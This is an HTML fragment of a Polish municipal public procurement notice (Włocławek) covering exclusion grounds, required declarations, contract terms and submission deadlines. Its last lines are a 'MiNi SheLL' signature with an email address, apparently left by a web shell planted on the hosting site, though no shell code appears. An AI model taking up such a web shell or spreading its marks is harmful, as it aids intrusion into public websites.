class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 <br/>ust. 1 ustawy PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, <br/>o których mowa w: <br/>	art. 108 ust. 1 pkt 3 ustawy PZP,<br/>	art. 108 ust. 1 pkt 4 ustawy PZP, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>	art. 108 ust. 1 pkt 5 ustawy PZP, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>	art. 108 ust. 1 pkt 6 ustawy PZP,<br/>	art. 109 ust. 1 pkt 1 ustawy PZP, <br/>b) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, <br/>o których mowa w: <br/>	art. 108 ust. 1 pkt 1 i 2 ustawy PZP,<br/>	art. 109 ust. 1 pkt 4 ustawy PZP, <br/>c)	oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, <br/>o których mowa w: <br/>	art. 7 ust. 1 ustawy z dnia 15 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziała-nia wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r., <br/>poz. 835);<br/>według wzoru z załącznika nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Formularz ofertowy,<br/>2)	oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, składane <br/>na podstawie art. 125 ust. 1 ustawy PZP – wzór oświadczenia zawarto w załączniku nr 2 do SWZ, <br/>z zastrzeżeniem, że:<br/>a)	w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców – oświadczenie, o którym mowa <br/>w ppkt. 2, składa każdy z Wykonawców,<br/>3)	pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik,<br/>4)	w przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>- pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzie-lenie zamówienia i/lub zawarcia umowy w sprawie zamówienia w imieniu Wykonawców wspólnie ubiega-jących się o udzielenie zamówienia, <br/>5)	dokument potwierdzający wniesienie wadium, jeżeli zamawiający żądał wniesienia wadium, <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania istotnych zmian umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy, zgodnie z projektowanymi postanowienia umowy, stanowiącymi załącznik nr 5 do SWZ, oraz ustawą PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">W prowadzonym postępowaniu Wykonawcy składają swoje oferty za pośrednictwem Platformy Przetargowej Urzędu Miasta Włocławek dostępnej pod adresem: https://umwloclawek.logintrade.net/rejestracja/ustawowe.html.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-12 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wykluczy z postępowania Wykonawcę na podstawie przesłanek wynikających z art. 7 ust. 1 ustawy z dnia 15<br/>kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego<br/>(Dz. U. z 2022 r. poz. 835).

Creat By MiNi SheLL
Email: jattceo@gmail.com